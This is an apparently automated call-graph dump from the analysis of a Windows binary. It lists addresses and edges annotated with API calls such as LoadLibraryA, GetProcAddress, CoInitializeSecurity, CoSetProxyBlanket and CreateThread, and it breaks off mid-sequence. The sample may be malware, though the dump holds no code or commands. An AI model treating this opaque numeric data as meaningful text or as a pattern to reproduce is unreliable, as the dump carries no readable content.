14020 3161368 14017->14020 14022 316138d 14019->14022 14020->14015 14059 3166991 14020->14059 14210 316b3f2 14022->14210 14023->14006 14024 316143e 14024->14014 14031 316110a 8 API calls 14024->14031 14025 316142c 14261 316110a 14025->14261 14032 3161438 14031->14032 14271 31610ba 14032->14271 14036->14009 14038 3169f6b 2 API calls 14037->14038 14039 316118e 14038->14039 14040 3169bfd 2 API calls 14039->14040 14041 31611aa 14040->14041 14042 3168d87 2 API calls 14041->14042 14043 31611b7 14042->14043 14043->14006 14043->14007 14279 3167eb5 14044->14279 14046 3167c84 14058 3161334 14046->14058 14290 31676f8 14046->14290 14048 3167cb5 14050 3168ddf 2 API calls 14048->14050 14049 3167cae 14049->14048 14307 3167692 14049->14307 14051 3167cf0 14050->14051 14053 3168ddf 2 API calls 14051->14053 14055 3167cfb 14053->14055 14057 3168ddf 2 API calls 14055->14057 14057->14058 14058->14014 14058->14015 14058->14017 14565 3168dc9 RtlAllocateHeap 14059->14565 14061 31669a7 14062 316aaff 4 API calls 14061->14062 14209 3166ea0 14061->14209 14063 31669bc 14062->14063 14566 316fd3d 14063->14566 14068 3169ab3 RtlAllocateHeap 14069 31669e0 14068->14069 14070 3169ab3 RtlAllocateHeap 14069->14070 14071 31669f4 14070->14071 14072 3166a19 14071->14072 14073 3169ab3 RtlAllocateHeap 14071->14073 14074 3169ab3 RtlAllocateHeap 14072->14074 14073->14072 14075 3166a3e 14074->14075 14592 316e849 14075->14592 14081 3166aac 14082 3166ab3 14081->14082 14639 3168dc9 RtlAllocateHeap 14081->14639 14085 316109a 2 API calls 14082->14085 14084 3166ac1 14084->14082 14640 316bb95 14084->14640 14086 3166b02 14085->14086 14644 316b83a 14086->14644 14090 3168d9a 2 API calls 14091 3166b1c 14090->14091 14092 316109a 2 API calls 14091->14092 14093 3166b28 14092->14093 14094 316b83a 5 API calls 14093->14094 14095 3166b33 14094->14095 14096 3168d9a 2 API calls 14095->14096 14097 3166b42 14096->14097 14098 316109a 2 API calls 14097->14098 14099 3166b4a 14098->14099 14100 316b83a 5 API calls 14099->14100 14101 3166b55 14100->14101 14102 3168d9a 2 API calls 14101->14102 14103 3166b64 14102->14103 14104 316109a 2 API calls 14103->14104 14105 3166b70 14104->14105 14106 316b83a 5 API calls 14105->14106 14107 3166b7b 14106->14107 14108 3168d9a 2 API calls 14107->14108 14109 3166b8a 14108->14109 14110 3166bdc 14109->14110 14111 316109a 2 API calls 14109->14111 14112 316109a 2 API calls 14110->14112 14113 3166ba3 14111->14113 14114 3166bec 14112->14114 14115 3169fe4 2 API calls 14113->14115 14116 316b83a 5 API calls 14114->14116 14117 3166bc5 14115->14117 14118 3166bf7 14116->14118 14119 3168d9a 2 API calls 14117->14119 14120 3168d9a 2 API calls 14118->14120 14122 3166bce 14119->14122 14121 3166c06 14120->14121 14123 316109a 2 API calls 14121->14123 14124 316b83a 5 API calls 14122->14124 14125 3166c12 14123->14125 14124->14110 14126 316b83a 5 API calls 14125->14126 14127 3166c1d 14126->14127 14128 3168d9a 2 API calls 14127->14128 14129 3166c2c 14128->14129 14130 316109a 2 API calls 14129->14130 14131 3166c34 14130->14131 14132 316b83a 5 API calls 14131->14132 14133 3166c3f 14132->14133 14134 3168d9a 2 API calls 14133->14134 14135 3166c4e 14134->14135 14136 316109a 2 API calls 14135->14136 14137 3166c5a 14136->14137 14138 316b83a 5 API calls 14137->14138 14139 3166c65 14138->14139 14140 3168d9a 2 API calls 14139->14140 14141 3166c74 14140->14141 14142 316109a 2 API calls 14141->14142 14143 3166c80 14142->14143 14144 316b83a 5 API calls 14143->14144 14145 3166c8b 14144->14145 14146 3168d9a 2 API calls 14145->14146 14147 3166c9a 14146->14147 14148 316109a 2 API calls 14147->14148 14149 3166ca6 14148->14149 14150 316b83a 5 API calls 14149->14150 14151 3166cb1 14150->14151 14152 3168d9a 2 API calls 14151->14152 14153 3166cc0 14152->14153 14154 316109a 2 API calls 14153->14154 14155 3166ccc 14154->14155 14156 316b83a 5 API calls 14155->14156 14157 3166cd7 14156->14157 14158 3168d9a 2 API calls 14157->14158 14209->14015 14211 316aab0 4 API calls 14210->14211 14212 316b404 14211->14212 14213 316a1f8 GetSystemTimeAsFileTime 14212->14213 14214 3161399 14213->14214 14215 3167d0f 14214->14215 14747 3170522 14215->14747 14217 3167d2f 14750 3168146 14217->14750 14921 3169905 14232->14921 14235 3170522 GetTickCount 14236 3167aee 14235->14236 14927 3167f12 14236->14927 14238 3161420 14238->14024 14238->14025 14239 3167b0e 14239->14238 14240 31676f8 19 API calls 14239->14240 14241 3167b3e 14240->14241 14245 3167692 8 API calls 14241->14245 14260 3167b45 14241->14260 14242 3168ddf 2 API calls 14243 3167c47 14242->14243 14244 3168ddf 2 API calls 14243->14244 14246 3167c52 14244->14246 14247 3167b6f 14245->14247 14248 3168ddf 2 API calls 14246->14248 14247->14260 14966 316793f 14247->14966 14248->14238 14250 3167b9a 14250->14260 14979 316780f 14250->14979 14253 316110a 8 API calls 14254 3167bda 14253->14254 14255 3167be6 14254->14255 14256 3168f63 memset 14254->14256 14993 31677be 14255->14993 14257 3167bfb 14256->14257 14259 3161d97 6 API calls 14257->14259 14259->14255 14260->14242 14262 3161120 14261->14262 14263 316a06e memset 14262->14263 14270 3161174 14262->14270 14264 3161146 14263->14264 14265 316a1f8 GetSystemTimeAsFileTime 14264->14265 14266 316115b 14265->14266 14267 316ac24 6 API calls 14266->14267 14268 3161169 14267->14268 14269 316abf8 6 API calls 14268->14269 14269->14270 14270->14032 14272 31610c6 14271->14272 14273 31610da 14271->14273 14274 316aaff 4 API calls 14272->14274 14275 316aaff 4 API calls 14273->14275 14276 31610cd 14274->14276 14275->14276 14277 3169fa5 2 API calls 14276->14277 14278 31610fd 14277->14278 14278->14014 14319 31711b3 14279->14319 14281 3167ebe 14323 3168927 14281->14323 14283 3167ed1 14284 3168927 strncpy 14283->14284 14285 3167ee5 14284->14285 14286 3168927 strncpy 14285->14286 14287 3167ef9 14286->14287 14327 3171c34 14287->14327 14289 3167f01 14289->14046 14419 31675e1 14290->14419 14293 316bf56 RtlAllocateHeap 14294 3167732 14293->14294 14304 3167767 14294->14304 14430 31674fe 14294->14430 14295 3168ddf 2 API calls 14297 316777f 14295->14297 14298 3168ddf 2 API calls 14297->14298 14299 316778a 14298->14299 14301 3168ddf 2 API calls 14299->14301 14300 3167740 14300->14304 14438 316faaf 14300->14438 14303 3167795 14301->14303 14305 316779f 14303->14305 14306 3168ddf 2 API calls 14303->14306 14304->14295 14305->14049 14306->14305 14308 316bfc8 2 API calls 14307->14308 14309 31676aa 14308->14309 14310 316755a 5 API calls 14309->14310 14315 31676e6 14309->14315 14311 31676c9 14310->14311 14312 3170485 lstrlenW 14311->14312 14313 31676dd 14312->14313 14314 3168ecb lstrlenW 14313->14314 14314->14315 14316 31678c5 14315->14316 14506 3171d21 14316->14506 14318 31678de 14318->14048 14320 31711bb 14319->14320 14322 31711c2 14320->14322 14332 31728ef 14320->14332 14322->14281 14324 316893d 14323->14324 14325 3168938 14323->14325 14350 3171293 14324->14350 14325->14283 14328 3171c43 14327->14328 14329 3171c48 14328->14329 14362 3171bd8 14328->14362 14329->14289 14331 3171c61 14331->14289 14333 3172931 14332->14333 14334 31728fe 14332->14334 14333->14322 14335 3172922 SwitchToThread 14334->14335 14336 317290f 14334->14336 14335->14333 14335->14335 14337 3172918 14336->14337 14339 31728c9 14336->14339 14337->14322 14344 3172951 GetModuleHandleW 14339->14344 14341 31728d6 14342 31728e4 14341->14342 14349 3172933 _time64 GetCurrentProcessId 14341->14349 14342->14337 14345 317296f GetProcAddress 14344->14345 14348 31729a0 14344->14348 14346 3172983 GetProcAddress 14345->14346 14345->14348 14347 3172992 GetProcAddress 14346->14347 14346->14348 14347->14348 14348->14341 14349->14342 14351 31712c5 14350->14351 14352 317129e 14350->14352 14351->14325 14352->14351 14354 31712d9 14352->14354 14355 3171307 14354->14355 14356 31712e4 14354->14356 14355->14351 14356->14355 14358 3172edb 14356->14358 14359 3172ef3 14358->14359 14360 3172f46 14359->14360 14361 3172f7a strncpy 14359->14361 14360->14355 14361->14360 14363 3171beb 14362->14363 14365 3171c07 14363->14365 14366 31714c5 14363->14366 14365->14331 14367 31714f3 14366->14367 14388 3171505 14366->14388 14368 31716c3 14367->14368 14369 31715b0 14367->14369 14370 317152f 14367->14370 14371 317155f 14367->14371 14376 317158f 14367->14376 14367->14388 14374 3171c8e 2 API calls 14368->14374 14407 3171c8e _snprintf 14369->14407 14373 3171535 _snprintf 14370->14373 14390 31733da 14371->14390 14373->14388 14378 31716f2 14374->14378 14402 3171a0a 14376->14402 14381 3171774 14378->14381 14386 31718aa 14378->14386 14378->14388 14379 31715bf 14380 31714c5 11 API calls 14379->14380 14379->14388 14380->14379 14383 31717b5 qsort 14381->14383 14381->14388 14382 3171a0a 2 API calls 14382->14386 14383->14388 14389 31717de 14383->14389 14384 31714c5 11 API calls 14384->14386 14385 3171a0a 2 API calls 14385->14389 14386->14382 14386->14384 14386->14388 14387 31714c5 11 API calls 14387->14389 14388->14365 14388->14388 14389->14385 14389->14387 14389->14388 14391 31733e7 _snprintf 14390->14391 14392 31733e4 14390->14392 14393 3173487 14391->14393 14394 3173410 14391->14394 14392->14391 14393->14388 14394->14393 14412 31733b3 localeconv 14394->14412 14397 317344e strchr 14397->14393 14400 3173461 14397->14400 14398 317342a strchr 14398->14397 14399 3173438 14398->14399 14399->14393 14399->14397 14400->14393 14415 3168ecb 14400->14415 14403 3171a20 14402->14403 14404 3171ba8 14403->14404 14405 3171b23 _snprintf 14403->14405 14406 3171b3a _snprintf 14403->14406 14404->14388 14405->14403 14406->14403 14409 3171caf 14407->14409 14408 3171cb6 14408->14379 14409->14408 14410 3172edb strncpy 14409->14410 14411 3171ccc 14410->14411 14411->14379 14413 31733c3 strchr 14412->14413 14414 31733d5 strchr 14412->14414 14413->14414 14414->14397 14414->14398 14416 3168ef7 14415->14416 14416->14416 14417 3168f17 lstrlenW 14416->14417 14418 3168f2b 14417->14418 14418->14393 14418->14418 14442 3168dc9 RtlAllocateHeap 14419->14442 14421 31675fb 14422 316767c 14421->14422 14423 317357b 2 API calls 14421->14423 14422->14293 14422->14305 14424 316761f 14423->14424 14443 316755a 14424->14443 14426 3167634 14427 3170485 lstrlenW 14426->14427 14428 3167667 14427->14428 14429 3168f63 memset 14428->14429 14429->14422 14431 316750f 14430->14431 14432 31698d0 2 API calls 14431->14432 14433 316752b 14432->14433 14452 3168dc9 RtlAllocateHeap 14433->14452 14435 3167536 14436 3167550 14435->14436 14437 3169fa5 2 API calls 14435->14437 14436->14300 14437->14436 14440 316fac3 14438->14440 14441 316fb09 14440->14441 14453 316fb10 14440->14453 14441->14304 14442->14421 14444 3167573 14443->14444 14445 3161080 2 API calls 14444->14445 14446 3167580 lstrcpynA 14445->14446 14447 316759e 14446->14447 14448 3168d87 2 API calls 14447->14448 14449 31675a8 14448->14449 14450 3168f63 memset 14449->14450 14451 31675cd 14450->14451 14451->14426 14452->14435 14458 316f7a3 memset memset 14453->14458 14455 316fb3c 14456 316fb5f 14455->14456 14484 316f5a1 14455->14484 14456->14440 14459 3169f6b 2 API calls 14458->14459 14460 316f7f5 14459->14460 14461 3169f6b 2 API calls 14460->14461 14462 316f802 14461->14462 14463 3169f6b 2 API calls 14462->14463 14464 316f80f 14463->14464 14465 3169f6b 2 API calls 14464->14465 14466 316f81c 14465->14466 14467 3169f6b 2 API calls 14466->14467 14468 316f829 14467->14468 14469 3168f63 memset 14468->14469 14470 316f83d 14469->14470 14471 316f8ba GetLastError 14470->14471 14472 316fa0d 14470->14472 14474 316f8fb GetLastError 14470->14474 14475 316f887 14470->14475 14478 316a1f8 GetSystemTimeAsFileTime 14470->14478 14479 316f953 GetLastError 14470->14479 14481 3169f6b 2 API calls 14470->14481 14482 3168d87 2 API calls 14470->14482 14483 316f9cd GetLastError 14470->14483 14500 316f6e9 14470->14500 14471->14470 14473 3168f63 memset 14472->14473 14472->14475 14476 316fa2f 14473->14476 14474->14470 14475->14455 14476->14475 14477 316fa4b GetLastError 14476->14477 14477->14475 14478->14470 14479->14470 14481->14470 14482->14470 14483->14470 14485 316f5be 14484->14485 14504 3168dc9 RtlAllocateHeap 14485->14504 14487 316f5d3 14488 316f5dc 14487->14488 14505 3168dc9 RtlAllocateHeap 14487->14505 14490 316f6af 14488->14490 14491 3168ddf 2 API calls 14488->14491 14492 316f6c7 14490->14492 14493 3168ddf 2 API calls 14490->14493 14491->14490 14492->14456 14493->14492 14494 316f689 GetLastError 14494->14488 14495 316f695 14494->14495 14497 316a1f8 GetSystemTimeAsFileTime 14495->14497 14496 316a1f8 GetSystemTimeAsFileTime 14498 316f5ec 14496->14498 14497->14488 14498->14488 14498->14490 14498->14494 14498->14496 14499 3168e5d 3 API calls 14498->14499 14499->14498 14501 316f70b 14500->14501 14502 316f730 GetLastError 14501->14502 14503 316f72b 14501->14503 14502->14503 14503->14470 14504->14487 14505->14498 14507 3171d74 14506->14507 14508 3171d2e 14506->14508 14507->14318 14508->14507 14511 317246c 14508->14511 14510 3171d61 14510->14318 14518 3171e6f 14511->14518 14513 3172483 14517 31724aa 14513->14517 14522 31725e0 14513->14522 14515 31724a1 14516 3171e6f 8 API calls 14515->14516 14515->14517 14516->14517 14517->14510 14519 3171e81 14518->14519 14521 3171eba 14519->14521 14532 317200e 14519->14532 14521->14513 14523 31725f7 14522->14523 14529 3172641 14522->14529 14524 3172667 14523->14524 14525 3172613 14523->14525 14523->14529 14558 31723ec 14524->14558 14527 3172656 14525->14527 14528 3172618 14525->14528 14548 31724dd 14527->14548 14528->14529 14531 3172629 memchr 14528->14531 14529->14515 14531->14529 14533 3172028 14532->14533 14534 317204d 14533->14534 14535 31720e2 14533->14535 14536 3172097 14533->14536 14534->14521 14535->14534 14539 317349a 14535->14539 14538 31720a7 _errno _strtoi64 _errno 14536->14538 14538->14534 14545 31734fe localeconv 14539->14545 14542 31734d2 14543 31734e1 _errno 14542->14543 14544 31734ed 14542->14544 14543->14544 14544->14534 14546 31734a9 _errno strtod 14545->14546 14547 317350e strchr 14545->14547 14546->14542 14546->14543 14547->14546 14549 31711b3 7 API calls 14548->14549 14550 31724e9 14549->14550 14551 3171e6f 8 API calls 14550->14551 14557 317250b 14550->14557 14556 31724ff 14551->14556 14552 3172528 memchr 14552->14556 14552->14557 14553 3171e6f 8 API calls 14553->14556 14554 31725e0 17 API calls 14554->14556 14555 31712d9 strncpy 14555->14556 14556->14552 14556->14553 14556->14554 14556->14555 14556->14557 14557->14529 14559 31723f5 14558->14559 14560 3171e6f 8 API calls 14559->14560 14562 3172410 14559->14562 14563 3172408 14560->14563 14561 31725e0 18 API calls 14561->14563 14562->14529 14563->14561 14563->14562 14564 3171e6f 8 API calls 14563->14564 14564->14563 14565->14061 14567 3169fa5 2 API calls 14566->14567 14568 31669c7 14567->14568 14569 316e795 14568->14569 14570 3169f85 2 API calls 14569->14570 14571 316e7aa 14570->14571 14718 316e485 CoInitializeEx CoInitializeSecurity CoCreateInstance 14571->14718 14574 3168d9a 2 API calls 14575 316e7c2 14574->14575 14576 3169f85 2 API calls 14575->14576 14591 31669cc 14575->14591 14577 316e7d6 14576->14577 14578 3169f85 2 API calls 14577->14578 14579 316e7e7 14578->14579 14725 316e6d9 SysAllocString SysAllocString 14579->14725 14581 316e7f8 14582 316e826 14581->14582 14584 3169ab3 RtlAllocateHeap 14581->14584 14583 3168d9a 2 API calls 14582->14583 14586 316e82f 14583->14586 14585 316e807 VariantClear 14584->14585 14585->14582 14588 3168d9a 2 API calls 14586->14588 14589 316e838 14588->14589 14731 316e539 14589->14731 14591->14068 14593 3169f85 2 API calls 14592->14593 14594 316e85b 14593->14594 14595 316e485 6 API calls 14594->14595 14596 316e865 14595->14596 14597 3168d9a 2 API calls 14596->14597 14598 316e873 14597->14598 14599 3166a80 14598->14599 14600 3169f85 2 API calls 14598->14600 14615 316e8fa 14599->14615 14601 316e887 14600->14601 14602 3169f85 2 API calls 14601->14602 14603 316e898 14602->14603 14604 316e6d9 10 API calls 14603->14604 14605 316e8a9 14604->14605 14606 316e8d7 14605->14606 14607 3169ab3 RtlAllocateHeap 14605->14607 14608 3168d9a 2 API calls 14606->14608 14609 316e8b8 VariantClear 14607->14609 14610 316e8e0 14608->14610 14609->14606 14612 3168d9a 2 API calls 14610->14612 14613 316e8e9 14612->14613 14614 316e539 2 API calls 14613->14614 14614->14599 14616 3169f85 2 API calls 14615->14616 14617 316e90f 14616->14617 14618 316e485 6 API calls 14617->14618 14619 316e919 14618->14619 14620 3168d9a 2 API calls 14619->14620 14621 316e927 14620->14621 14622 3166a88 14621->14622 14623 3169f85 2 API calls 14621->14623 14638 3168dc9 RtlAllocateHeap 14622->14638 14624 316e93b 14623->14624 14625 3169f85 2 API calls 14624->14625 14626 316e94c 14625->14626 14627 316e6d9 10 API calls 14626->14627 14628 316e95d 14627->14628 14629 316e98b 14628->14629 14630 3169ab3 RtlAllocateHeap 14628->14630 14631 3168d9a 2 API calls 14629->14631 14632 316e96c VariantClear 14630->14632 14633 316e994 14631->14633 14632->14629 14634 3168d9a 2 API calls 14633->14634 14636 316e99d 14634->14636 14637 316e539 2 API calls 14636->14637 14637->14622 14638->14081 14639->14084 14641 316bbb1 14640->14641 14642 3168f63 memset 14641->14642 14643 316bbcf 14641->14643 14642->14643 14643->14082 14645 3168f63 memset 14644->14645 14646 316b87e 14645->14646 14647 3168f63 memset 14646->14647 14648 316b88a 14647->14648 14651 3166b0d 14648->14651 14657 316b9e2 14648->14657 14736 3168dc9 RtlAllocateHeap 14648->14736 14650 3168ddf 2 API calls 14650->14651 14651->14090 14652 3169a76 RtlAllocateHeap 14654 316b8f9 14652->14654 14653 3169bfd 2 API calls 14653->14654 14654->14651 14654->14652 14654->14653 14655 3168ddf 2 API calls 14654->14655 14656 316b9a8 14654->14656 14654->14657 14655->14654 14656->14657 14658 3169b26 2 API calls 14656->14658 14657->14650 14659 316b9cb 14658->14659 14659->14657 14660 316b9d1 14659->14660 14661 3168ddf 2 API calls 14660->14661 14661->14651 14719 316e4ca SysAllocString 14718->14719 14720 316e507 14718->14720 14721 316e4e5 14719->14721 14720->14574 14721->14720 14722 316e4e9 CoSetProxyBlanket 14721->14722 14722->14720 14723 316e500 14722->14723 14735 3168dc9 RtlAllocateHeap 14723->14735 14726 3169f85 2 API calls 14725->14726 14727 316e704 SysAllocString 14726->14727 14728 3168d9a 2 API calls 14727->14728 14730 316e717 SysFreeString SysFreeString SysFreeString 14728->14730 14730->14581 14732 316e544 14731->14732 14733 3168ddf 2 API calls 14732->14733 14734 316e561 14733->14734 14734->14591 14735->14720 14736->14654 14748 3170542 GetTickCount 14747->14748 14749 3170531 __aulldiv 14747->14749 14748->14217 14749->14217 14751 31711b3 7 API calls 14750->14751 14752 3168156 14751->14752 14753 3168927 strncpy 14752->14753 14754 316816f 14753->14754 14755 3168927 strncpy 14754->14755 14756 3168183 14755->14756 14757 3168927 strncpy 14756->14757 14758 3168194 14757->14758 14759 3168927 strncpy 14758->14759 14760 31681a7 14759->14760 14761 3168927 strncpy 14760->14761 14762 31681bd 14761->14762 14763 3168927 strncpy 14762->14763 14764 31681d1 14763->14764 14765 3168927 strncpy 14764->14765 14766 31681ea 14765->14766 14767 3168927 strncpy 14766->14767 14768 31681fe 14767->14768 14769 3168927 strncpy 14768->14769 14770 3168212 14769->14770 14771 3168927 strncpy 14770->14771 14772 3168226 14771->14772 14773 3168927 strncpy 14772->14773 14774 316823c 14773->14774 14775 3168927 strncpy 14774->14775 14776 3168253 14775->14776 14906 3168983 14776->14906 14779 3168927 strncpy 14780 3168266 14779->14780 14781 3168927 strncpy 14780->14781 14782 316827a 14781->14782 14783 3168927 strncpy 14782->14783 14784 316828e 14783->14784 14785 3168983 5 API calls 14784->14785 14786 3168296 14785->14786 14787 3168927 strncpy 14786->14787 14788 31682a1 14787->14788 14789 3168983 5 API calls 14788->14789 14790 31682a9 14789->14790 14791 3168927 strncpy 14790->14791 14792 31682b4 14791->14792 14793 3168983 5 API calls 14792->14793 14794 31682bc 14793->14794 14795 3168927 strncpy 14794->14795 14796 31682c7 14795->14796 14797 3168927 strncpy 14796->14797 14798 31682db 14797->14798 14799 3168983 5 API calls 14798->14799 14800 31682e3 14799->14800 14801 3168927 strncpy 14800->14801 14802 31682ee 14801->14802 14803 3168927 strncpy 14802->14803 14804 3168308 14803->14804 14805 3168983 5 API calls 14804->14805 14806 3168310 14805->14806 14807 3168927 strncpy 14806->14807 14808 316831b 14807->14808 14809 3168927 strncpy 14808->14809 14810 316832f 14809->14810 14811 3168927 strncpy 14810->14811 14812 3168343 14811->14812 14813 3168983 5 API calls 14812->14813 14814 3168357 14813->14814 14815 3168927 strncpy 14814->14815 14816 3168362 14815->14816 14817 3168927 strncpy 14816->14817 14818 3168376 14817->14818 14819 3168927 strncpy 14818->14819 14820 316838a 14819->14820 14821 3168983 5 API calls 14820->14821 14822 3168395 14821->14822 14823 3168927 strncpy 14822->14823 14824 31683a0 14823->14824 14825 3168983 5 API calls 14824->14825 14826 31683ab 14825->14826 14827 3168927 strncpy 14826->14827 14828 31683b6 14827->14828 14829 3168983 5 API calls 14828->14829 14830 31683c1 14829->14830 14831 3168927 strncpy 14830->14831 14832 31683cc 14831->14832 14833 3168983 5 API calls 14832->14833 14834 31683d7 14833->14834 14835 3168927 strncpy 14834->14835 14836 31683e2 14835->14836 14837 3168983 5 API calls 14836->14837 14838 31683ed 14837->14838 14839 3168927 strncpy 14838->14839 14840 31683f8 14839->14840 14841 3168983 5 API calls 14840->14841 14842 3168403 14841->14842 14843 3168927 strncpy 14842->14843 14844 316840e 14843->14844 14845 3168983 5 API calls 14844->14845 14846 3168419 14845->14846 14847 3168927 strncpy 14846->14847 14848 3168424 14847->14848 14911 3169b62 14906->14911 14908 3168996 14909 3168ddf 2 API calls 14908->14909 14910 316825b 14908->14910 14909->14910 14910->14779 14912 3169b71 WideCharToMultiByte 14911->14912 14918 3169bc1 14911->14918 14913 3169b8c 14912->14913 14912->14918 14920 3168dc9 RtlAllocateHeap 14913->14920 14915 3169b95 14916 3169b9d WideCharToMultiByte 14915->14916 14915->14918 14917 3169bb6 14916->14917 14916->14918 14919 3168ddf 2 API calls 14917->14919 14918->14908 14919->14918 14920->14915 14922 3169913 14921->14922 14923 31736d5 2 API calls 14922->14923 14925 316995d 14923->14925 14924 3167ae9 14924->14235 14925->14924 14926 31736d5 2 API calls 14925->14926 14926->14925 14928 31711b3 7 API calls 14927->14928 14929 3167f21 14928->14929 14930 3168927 strncpy 14929->14930 14931 3167f37 14930->14931 14932 3168927 strncpy 14931->14932 14933 3167f4c 14932->14933 14934 3168927 strncpy 14933->14934 14935 3167f60 14934->14935 14936 3168927 strncpy 14935->14936 14937 3167f75 14936->14937 14938 3168927 strncpy 14937->14938 14939 3167f86 14938->14939 14940 3168927 strncpy 14939->14940 14941 3167f9f 14940->14941 14942 3168927 strncpy 14941->14942 14943 3167fb5 14942->14943 14944 3168927 strncpy 14943->14944 14945 3167fc6 14944->14945 14946 3168927 strncpy 14945->14946 14947 3167fda 14946->14947 14948 3168927 strncpy 14947->14948 14949 3167fed 14948->14949 14950 3168927 strncpy 14949->14950 14951 3168001 14950->14951 14952 3168927 strncpy 14951->14952 14953 3168020 14952->14953 14954 3168983 5 API calls 14953->14954 14955 3168031 14954->14955 14956 3168927 strncpy 14955->14956 14957 316803c 14956->14957 14958 3168983 5 API calls 14957->14958 14959 316804d 14958->14959 14960 3168927 strncpy 14959->14960 14961 3168058 14960->14961 14962 3168927 strncpy 14961->14962 14963 3168074 14962->14963 14964 3171c34 13 API calls 14963->14964 14965 316807c 14964->14965 14965->14239 14967 3171d21 18 API calls 14966->14967 14969 316795d 14967->14969 14968 3167969 14968->14250 14969->14968 14970 316a06e memset 14969->14970 14971 316799d 14970->14971 14971->14968 15000 3168dc9 RtlAllocateHeap 14971->15000 14973 3167a75 14975 3168ddf 2 API calls 14973->14975 14977 3167a86 14973->14977 14974 3167a21 14974->14968 14974->14973 14976 3169a76 RtlAllocateHeap 14974->14976 14975->14973 14976->14974 14978 3168ddf 2 API calls 14977->14978 14978->14968 14980 3167826 14979->14980 14981 316bfc8 2 API calls 14980->14981 14989 31678b6 14980->14989 14982 3167842 14981->14982 14982->14989 14992 316788e 14982->14992 15001 3168dc9 RtlAllocateHeap 14982->15001 14984 3168ddf 2 API calls 14986 31678ac 14984->14986 14985 316785f 14988 3169fa5 2 API calls 14985->14988 14985->14992 14987 3168ddf 2 API calls 14986->14987 14987->14989 14990 316787e 14988->14990 14989->14253 14989->14260 15002 3168bbb 14990->15002 14992->14984 15018 316808f 14993->15018 14995 31677db 14996 31676f8 19 API calls 14995->14996 14997 31677fb 14996->14997 14998 3168ddf 2 API calls 14997->14998 14999 3167806 14998->14999 14999->14260 15000->14974 15001->14985 15005 3168a4f 15002->15005 15012 31689b9 15005->15012 15007 3168a7c 15007->14992 15008 3168aa8 GetLastError 15011 3168b37 15008->15011 15009 3168a75 15009->15007 15009->15008 15009->15011 15010 3168ddf 2 API calls 15010->15007 15011->15010 15017 3168dc9 RtlAllocateHeap 15012->15017 15014 31689ca 15015 3168a1b lstrlenW 15014->15015 15016 3168a2c 15014->15016 15015->15016 15016->15009 15016->15016 15017->15014 15019 31711b3 7 API calls 15018->15019 15020 316809e 15019->15020 15021 3168927 strncpy 15020->15021 15022 31680b4 15021->15022 15023 3168927 strncpy 15022->15023 15024 31680c8 15023->15024 15025 3168927 strncpy 15024->15025 15026 31680d9 15025->15026 15027 3168927 strncpy 15026->15027 15028 31680ea 15027->15028 15029 3168927 strncpy 15028->15029 15030 31680ff 15029->15030 15031 3168927 strncpy 15030->15031 15032 3168115 15031->15032 15033 3168927 strncpy 15032->15033 15034 316812b 15033->15034 15035 3171c34 13 API calls 15034->15035 15036 3168133 15035->15036 15036->14995 11204 3166603 11205 3166611 11204->11205 11210 3166669 11204->11210 11233 3168db4 HeapCreate 11205->11233 11207 3166616 11234 3169787 11207->11234 11217 3166664 11219 3168d9a 2 API calls 11217->11219 11218 316666e 11254 3168d9a 11218->11254 11219->11210 11226 31666c5 CreateThread 11226->11210 11334 31663a2 11226->11334 11227 316f0d9 8 API calls 11228 31666a0 11227->11228 11267 316647a memset 11228->11267 11233->11207 11286 3168dc9 RtlAllocateHeap 11234->11286 11236 316661b 11237 3173d36 11236->11237 11238 3173d6b 11237->11238 11287 3168e2e 11238->11287 11240 3166629 11241 316f0d9 11240->11241 11291 3169f6b 11241->11291 11244 316f103 LoadLibraryA 11246 316f10a 11244->11246 11245 316f0fb GetModuleHandleA 11245->11246 11247 316f118 11246->11247 11294 316f08e 11246->11294 11299 3168d87 11247->11299 11251 3169f85 11317 3168ca3 11251->11317 11253 3166650 GetFileAttributesW 11253->11217 11253->11218 11255 3168da8 11254->11255 11257 3166673 11254->11257 11256 3168ddf 2 API calls 11255->11256 11256->11257 11258 316109a 11257->11258 11259 3168ca3 2 API calls 11258->11259 11260 31610b5 11259->11260 11261 316fcda 11260->11261 11262 316fcf6 11261->11262 11263 3166687 11262->11263 11323 3168dc9 RtlAllocateHeap 11262->11323 11263->11226 11263->11227 11265 316fd09 11265->11263 11266 3168ddf 2 API calls 11265->11266 11266->11263 11324 3161080 11267->11324 11269 31664a6 11270 31664b7 11269->11270 11271 31664f8 11269->11271 11273 3161080 2 API calls 11270->11273 11272 3161080 2 API calls 11271->11272 11274 3166502 11272->11274 11275 31664c1 11273->11275 11278 3168d87 2 API calls 11274->11278 11327 3169fa5 11275->11327 11277 31664d7 11279 3168d87 2 API calls 11277->11279 11280 31664e2 11278->11280 11279->11280 11281 3168ddf 11280->11281 11282 31666b5 11281->11282 11283 3168de9 11281->11283 11282->11226 11283->11282 11284 3168f63 memset 11283->11284 11285 3168e19 HeapFree 11284->11285 11285->11282 11286->11236 11290 3168dc9 RtlAllocateHeap 11287->11290 11289 3168e3f 11289->11240 11290->11289 11303 3168bcd 11291->11303 11310 3168dc9 RtlAllocateHeap 11294->11310 11296 316f0cf 11296->11247 11297 316f0a0 11297->11296 11311 316ef38 11297->11311 11300 3168d8f 11299->11300 11301 316663f 11299->11301 11302 3168ddf 2 API calls 11300->11302 11301->11251 11302->11301 11304 3168be4 11303->11304 11308 3168c05 11303->11308 11304->11308 11309 3168dc9 RtlAllocateHeap 11304->11309 11305 3168c4c lstrlenW 11306 3168c58 11305->11306 11306->11244 11306->11245 11308->11305 11308->11306 11309->11308 11310->11297 11312 316efac 11311->11312 11313 316ef51 11311->11313 11312->11297 11313->11312 11314 316f004 LoadLibraryA 11313->11314 11314->11312 11315 316f012 GetProcAddress 11314->11315 11315->11312 11316 316f01e 11315->11316 11316->11312 11319 3168cc4 lstrlenW 11317->11319 11322 3168dc9 RtlAllocateHeap 11319->11322 11321 3168d4b 11321->11253 11321->11321 11322->11321 11323->11265 11325 3168bcd 2 API calls 11324->11325 11326 3161096 11325->11326 11326->11269 11331 3168f63 11327->11331 11330 3169fd3 11330->11277 11332 3168f6c memset 11331->11332 11333 3168f7d _vsnprintf 11331->11333 11332->11333 11333->11330 11346 316651e 11334->11346 11338 31663b3 11340 31663ed 11338->11340 11345 31663bd 11338->11345 11409 316d889 11338->11409 11341 3166424 11340->11341 11342 316641d 11340->11342 11341->11345 11449 3163597 11341->11449 11425 31661e8 11342->11425 11347 316f0d9 8 API calls 11346->11347 11348 3166532 11347->11348 11349 316f0d9 8 API calls 11348->11349 11350 316654b 11349->11350 11351 316f0d9 8 API calls 11350->11351 11352 3166564 11351->11352 11353 316f0d9 8 API calls 11352->11353 11354 316657d 11353->11354 11355 316f0d9 8 API calls 11354->11355 11356 